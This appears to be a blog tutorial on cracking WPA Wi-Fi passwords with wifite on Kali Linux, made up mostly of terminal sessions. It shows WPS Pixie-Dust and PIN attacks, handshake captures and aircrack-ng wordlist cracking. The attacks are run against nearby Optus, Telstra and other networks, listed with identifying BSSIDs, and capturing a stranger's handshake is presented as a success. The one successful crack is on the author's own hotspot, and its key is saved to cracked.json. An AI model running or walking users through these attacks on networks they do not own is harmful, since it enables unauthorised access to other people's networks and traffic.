To crack a wireless network using wifite, use it as root on Kali Linux.
This will automatically set up monitor mode and then begin the process of scanning for networks.
┌──(kali㉿kali)-[~] └─$ sudo wifite . . .´ · . . · `. wifite2 2.7.0 : : : (¯) : : : a wireless auditor by derv82 `. · ` /¯\ ´ · .´ maintained by kimocoder ` /¯¯¯\ ´ https://github.com/kimocoder/wifite2 [!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool [!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740) [!] If you have problems: kill -9 PID or re-run wifite with --kill Interface PHY Driver Chipset ----------------------------------------------------------------------- 1. wlan0 phy0 rtw_8822bu Realtek Semiconductor Corp. 802.11ac NIC [+] Enabling monitor mode on wlan0... enabled! NUM ESSID CH ENCR PWR WPS CLIENT --- ------------------------- --- ----- ---- --- ------ 1 Blade A31 1 WPA-P 44db no 1 2 OPTUS_D3CB28N 11 WPA-P 26db yes 3 OPTUS_D02825 11 WPA-P 24db yes 4 Telstra20E859 2 WPA-P 21db yes 5 TelstraD22F23 11 WPA-P 21db lock 6 TelstraDB031C 11 WPA-P 21db yes 7 Telstra20E859* 1 WPA-P 18db yes 8 Telstra6C5A3A 11 WPA-P 18db yes 9 WiFi-955DD6 3 WPA-P 16db no 10 USO 6 WPA-P 15db no 11 Telstra1B31 11 WPA-P 14db yes [+] Select target(s) (1-11) separated by commas, dashes or all: |
Then, press Control-C to select a target. Type the corresponding number for the target you wish to attack. This attack was not successful, but it showed promise as I captured a handshake, which may be useful later.
[+] (1/1) Starting attacks against 34:6B:46:D0:28:28 (OPTUS_D02825) [+] OPTUS_D02825 (27db) WPS Pixie-Dust: [4m55s] Failed: Reaver says "WPS pin not found" [+] OPTUS_D02825 (30db) WPS NULL PIN: [4m55s] Failed: Reaver process stopped (exit code: 1) [+] OPTUS_D02825 (29db) WPS PIN Attack: [10s PINs:2] Failed: Because access point is Locked [!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcapngtool [+] OPTUS_D02825 (28db) WPA Handshake capture: Discovered new client: CC:3F:1D:02:BA:C7 [+] OPTUS_D02825 (28db) WPA Handshake capture: Discovered new client: E8:6F:38:5C:16:5A [+] OPTUS_D02825 (28db) WPA Handshake capture: Captured handshake [+] saving copy of handshake to hs/handshake_OPTUSD02825_34-6B-46-D0-28-28_2024-03-08T03-30-41.cap saved [+] analysis of captured handshake file: [+] tshark: .cap file contains a valid handshake for (34:6b:46:d0:28:28) [+] aircrack: .cap file contains a valid handshake for (34:6B:46:D0:28:28) [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist [+] Cracking WPA Handshake: 100.00% ETA: 0s @ 20115.9kps (current key: anchoritish) [!] Failed to crack handshake: wordlist-probable.txt did not contain password [+] Finished attacking 1 target(s), exiting |
Here is another attack on a wireless network. This one was not successful either, but this shows how I can easily capture a handshake
[+] (1/1) Starting attacks against D6:35:1D:DB:03:24 (TelstraDB031C) [+] TelstraDB031C (22db) WPS Pixie-Dust: [4m57s] Failed: Reaver says "WPS pin not found" [+] TelstraDB031C (25db) WPS NULL PIN: [4m22s] Failed: Reaver process stopped (exit code: 1) [+] TelstraDB031C (23db) WPS PIN Attack: [1m4s PINs:2] Failed: Because access point is Locked [!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcapngtool [+] TelstraDB031C (23db) WPA Handshake capture: Discovered new client: CA:E9:CD:03:EC:60 [+] TelstraDB031C (22db) WPA Handshake capture: Captured handshake [+] saving copy of handshake to hs/handshake_TelstraDB031C_D6-35-1D-DB-03-24_2024-03-08T03-35-28.cap saved [+] analysis of captured handshake file: [+] tshark: .cap file contains a valid handshake for (d6:35:1d:db:03:24) [+] aircrack: .cap file contains a valid handshake for (D6:35:1D:DB:03:24) [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist [+] Cracking WPA Handshake: 100.00% ETA: 0s @ 21097.1kps (current key: answer123) [!] Failed to crack handshake: wordlist-probable.txt did not contain password [+] Finished attacking 1 target(s), exiting |
Run wifite with the –dict parameter to select a custom wordlist.
┌──(kali㉿kali)-[~] └─$ sudo wifite --dict rockyou.txt . . .´ · . . · `. wifite2 2.7.0 : : : (¯) : : : a wireless auditor by derv82 `. · ` /¯\ ´ · .´ maintained by kimocoder ` /¯¯¯\ ´ https://github.com/kimocoder/wifite2 [+] option: using wordlist rockyou.txt for cracking [!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool [!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740) [!] If you have problems: kill -9 PID or re-run wifite with --kill [+] Using wlan0 already in monitor mode NUM ESSID CH ENCR PWR WPS CLIENT --- ------------------------- --- ----- ---- --- ------ 1 Blade A31 1 WPA-P 31db no 1 2 Telstra20E859 2 WPA-P 23db yes 1 3 OPTUS_D3CB28N 11 WPA-P 22db yes 4 TelstraDB031C 11 WPA-P 22db yes 1 5 OPTUS_D02825* 11 WPA-P 21db yes 6 TelstraD22F23 11 WPA-P 21db lock 7 USO 6 WPA-P 20db no 8 Telstra6C5A3A 11 WPA-P 20db yes 9 Telstra20E859 1 WPA-P 18db yes 10 Telstra1B31 11 WPA-P 16db yes [+] Select target(s) (1-10) separated by commas, dashes or all: 7 |
This can help, but you need to be lucky to find a valid password with such a small wordlist. If it was 2 terabytes you would have more luck. But these instructions should help you on the right track to cracking Wi-Fi with Kali Linux.
┌──(kali㉿kali)-[~] └─$ sudo wifite --dict rockyou.txt . . .´ · . . · `. wifite2 2.7.0 : : : (¯) : : : a wireless auditor by derv82 `. · ` /¯\ ´ · .´ maintained by kimocoder ` /¯¯¯\ ´ https://github.com/kimocoder/wifite2 [+] option: using wordlist rockyou.txt for cracking [!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool [!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740) [!] If you have problems: kill -9 PID or re-run wifite with --kill [+] Using wlan0 already in monitor mode NUM ESSID CH ENCR PWR WPS CLIENT --- ------------------------- --- ----- ---- --- ------ 1 Blade A31 1 WPA-P 33db no 1 2 OPTUS_D02825 11 WPA-P 27db yes 3 Telstra20E859 1 WPA-P 24db yes 4 OPTUS_D3CB28N 11 WPA-P 24db yes 5 Telstra20E859 2 WPA-P 21db yes 6 USO 6 WPA-P 21db no 7 Telstra6C5A3A 11 WPA-P 19db yes 8 TelstraD22F23 11 WPA-P 19db lock 9 TelstraDB031C 11 WPA-P 19db yes 1 [+] Select target(s) (1-9) separated by commas, dashes or all: 1 [+] (1/1) Starting attacks against BA:E5:CD:AF:70:8C (Blade A31) [!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcapngtool [+] Blade A31 (32db) WPA Handshake capture: Discovered new client: 66:0D:3C:B1:5C:1B [+] Blade A31 (31db) WPA Handshake capture: Captured handshake [+] saving copy of handshake to hs/handshake_BladeA31_BA-E5-CD-AF-70-8C_2024-03-08T03-43-34.cap saved [+] analysis of captured handshake file: [+] tshark: .cap file contains a valid handshake for (ba:e5:cd:af:70:8c) [+] aircrack: .cap file contains a valid handshake for (BA:E5:CD:AF:70:8C) [+] Cracking WPA Handshake: Running aircrack-ng with rockyou.txt wordlist [!] Failed to crack handshake: rockyou.txt did not contain password [+] Finished attacking 1 target(s), exiting |
Install this tool to have more advanced functionality for wifite.
┌──(kali㉿kali)-[~] └─$ sudo apt install hcxdumptool hcxtools |
I did create a network myself on my phone and then I connected to it. This allowed me to capture the handshake and then the password was in the wordlist. This is what a sucessful capture looks like.
┌──(kali㉿kali)-[~] └─$ sudo wifite --dict rockyou.txt . . .´ · . . · `. wifite2 2.7.0 : : : (¯) : : : a wireless auditor by derv82 `. · ` /¯\ ´ · .´ maintained by kimocoder ` /¯¯¯\ ´ https://github.com/kimocoder/wifite2 [+] option: using wordlist rockyou.txt for cracking [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740) [!] If you have problems: kill -9 PID or re-run wifite with --kill [+] Using wlan0 already in monitor mode NUM ESSID CH ENCR PWR WPS CLIENT --- ------------------------- --- ----- ---- --- ------ 1 354535343434576437974... 6 WPA-P 60db no 2 Blade A31 1 WPA-P 30db no 1 3 OPTUS_D3CB28N 11 WPA-P 26db yes 4 Telstra20E859 1 WPA-P 25db yes 5 Telstra20E859* 2 WPA-P 21db yes 6 TelstraDB031C 11 WPA-P 20db yes 1 7 TelstraD22F23 11 WPA-P 19db lock 8 USO 7 WPA-P 18db no 9 Telstra6C5A3A 11 WPA-P 17db yes 10 WiFi-955DD6 3 WPA-P 16db no 11 OPTUS_D02825 11 WPA-P 15db yes [+] Select target(s) (1-11) separated by commas, dashes or all: 1 [+] (1/1) Starting attacks against 6E:85:E1:CF:4C:39 (354535343434576437974355444) [+] 354535343434576437974355444 (60db) PMKID CAPTURE: Failed to capture PMKID [+] 354535343434576437974355444 (57db) WPA Handshake capture: Captured handshake [+] saving copy of handshake to hs/handshake_354535343434576437974355444_6E-85-E1-CF-4C-39_2024-03-08T04-17-15.cap saved [+] analysis of captured handshake file: [+] tshark: .cap file contains a valid handshake for (6e:85:e1:cf:4c:39) [+] aircrack: .cap file contains a valid handshake for (6E:85:E1:CF:4C:39) [+] Cracking WPA Handshake: Running aircrack-ng with rockyou.txt wordlist [+] Cracking WPA Handshake: 0.02% ETA: 8m38s @ 19856.3kps (current key: password3) [+] Cracked WPA Handshake PSK: password3 [+] Access Point Name: 354535343434576437974355444 [+] Access Point BSSID: 6E:85:E1:CF:4C:39 [+] Encryption: WPA [+] Handshake File: hs/handshake_354535343434576437974355444_6E-85-E1-CF-4C-39_2024-03-08T04-17-15.cap [+] PSK (password): password3 [+] saved crack result to cracked.json (1 total) [+] Finished attacking 1 target(s), exiting |
This is the cracked.json file.
[ { "type": "WPA", "date": 1709871435, "essid": "354535343434576437974355444", "bssid": "6E:85:E1:CF:4C:39", "key": "password3", "handshake_file": "hs/handshake_354535343434576437974355444_6E-85-E1-CF-4C-39_2024-03-08T04-17-15.cap" } ] |
This has all the information I need.